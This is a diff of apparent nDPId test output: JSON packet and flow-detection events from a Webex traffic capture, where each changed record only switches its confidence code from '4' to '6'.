00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1444570679512,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570679512,"pkt":"ABoRAAACABoRAAABCABFAAA8dLdAAEAGDZsKCAABrfMAbtl1Abugj6duAAAAAKACOQhfOgAAAgQFtAQCCAoATNPZAAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":822,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1444570679516,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570679516,"pkt":"ABoRAAACABoRAAABCABFAAAoAphAABAGr86t8wBuCggAAQG72XVfcFiRoI+nb1AS\/\/8cNwAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":823,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1444570679516,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570679516,"pkt":"ABoRAAACABoRAAABCABFAAAodLhAAEAGDa4KCAABrfMAbtl1Abugj6dvX3BYklAQOQjjLwAA"} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570679512,"flow_last_seen":1444570679526,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570679526,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":846,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570679512,"flow_last_seen":1444570680091,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":511,"midstream":0,"thread_ts_msec":1444570680091,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570679512,"flow_last_seen":1444570679526,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570679526,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":846,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570679512,"flow_last_seen":1444570680091,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":511,"midstream":0,"thread_ts_msec":1444570680091,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1058,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570693238,"flow_last_seen":1444570693238,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570693238,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1444570693238,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570693238,"pkt":"ABoRAAACABoRAAABCABFAAA8LOJAAEAGVXAKCAABrfMAbtl3AbsPD\/XWAAAAAKACOQic9QAAAgQFtAQCCAoATNk0AAAAAAEDAwY="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1059,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1444570693244,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570693244,"pkt":"ABoRAAACABoRAAABCABFAAAoAxBAABAGr1at8wBuCggAAQG72Xfw8AopDw\/111AS\/\/8cNQAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1060,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1444570693245,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570693245,"pkt":"ABoRAAACABoRAAABCABFAAAoLONAAEAGVYMKCAABrfMAbtl3AbsPD\/XX8PAKKlAQOQjjLQAA"} -00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1063,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570693238,"flow_last_seen":1444570693297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570693297,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1074,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570693238,"flow_last_seen":1444570693766,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570693766,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1063,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570693238,"flow_last_seen":1444570693297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570693297,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1074,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570693238,"flow_last_seen":1444570693766,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570693766,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1112,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570694561,"flow_last_seen":1444570694561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570694561,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1444570694561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570694561,"pkt":"ABoRAAACABoRAAABCABFAAA802lAAEAGOT4KCAABPm3lnsp\/AbubwQrQAAAAAKACOQiUEgAAAgQFtAQCCAoATNm5AAAAAAEDAwY="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1444570694564,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570694564,"pkt":"ABoRAAACABoRAAABCABFAAAoAytAABAGOZE+beWeCggAAQG7yn9kPvUvm8EK0VAS\/\/+1ggAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1444570694564,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570694564,"pkt":"ABoRAAACABoRAAABCABFAAAo02pAAEAGOVEKCAABPm3lnsp\/AbubwQrRZD71MFAQOQh8ewAA"} -00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1115,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570694561,"flow_last_seen":1444570694614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570694614,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1115,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570694561,"flow_last_seen":1444570694614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570694614,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1230,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699074,"flow_last_seen":1444570699074,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699074,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1230,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1444570699074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699074,"pkt":"ABoRAAACABoRAAABCABFAAA8OjpAAEAGn3oKCAABNvEgDrSDAbvRQeFHAAAAAKACOQhpXwAAAgQFtAQCCAoATNt9AAAAAAEDAwY="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1444570699077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699077,"pkt":"ABoRAAACABoRAAABCABFAAAoA2VAABAGBmQ28SAOCggAAQG7tIMuvh640UHhSFAS\/\/+YiwAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1232,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1444570699077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699077,"pkt":"ABoRAAACABoRAAABCABFAAAoOjtAAEAGn40KCAABNvEgDrSDAbvRQeFILr4euVAQOQhfhAAA"} -00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1233,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699074,"flow_last_seen":1444570699079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570699079,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1233,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699074,"flow_last_seen":1444570699079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570699079,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1235,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699096,"flow_last_seen":1444570699096,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699096,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1444570699096,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699096,"pkt":"ABoRAAACABoRAAABCABFAAA8731AAEAGBawKCAABTi7tW+lsAFBr3TT9AAAAAKACOQhjAgAAAgQFtAQCCAoATNuAAAAAAAEDAwY="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1444570699101,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699101,"pkt":"ABoRAAACABoRAAABCABFAAAoA2dAABAGIddOLu1bCggAAQBQ6WyUIssCa900\/lAS\/\/+AggAA"} @@ -254,17 +254,17 @@ 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1238,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1444570699106,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699106,"pkt":"ABoRAAACABoRAAABCABFAAAoA2hAABAGIdZOLu1bCggAAQBQ6W3tNUJzEsq9jVAS\/\/+AgQAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1239,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1444570699107,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699107,"pkt":"ABoRAAACABoRAAABCABFAAAo735AAEAGBb8KCAABTi7tW+lsAFBr3TT+lCLLA1AQOQhHewAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1444570699107,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699107,"pkt":"ABoRAAACABoRAAABCABFAAAoZg1AAEAGjzAKCAABTi7tW+ltAFASyr2N7TVCdFAQOQhHegAA"} -00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1241,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699096,"flow_last_seen":1444570699201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1444570699201,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/registerDevice","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} -00849{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1243,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699096,"flow_last_seen":1444570699202,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1444570699202,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/registerDevice","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} -00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1245,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699101,"flow_last_seen":1444570699212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":334,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1444570699212,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/applicationOpen","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} 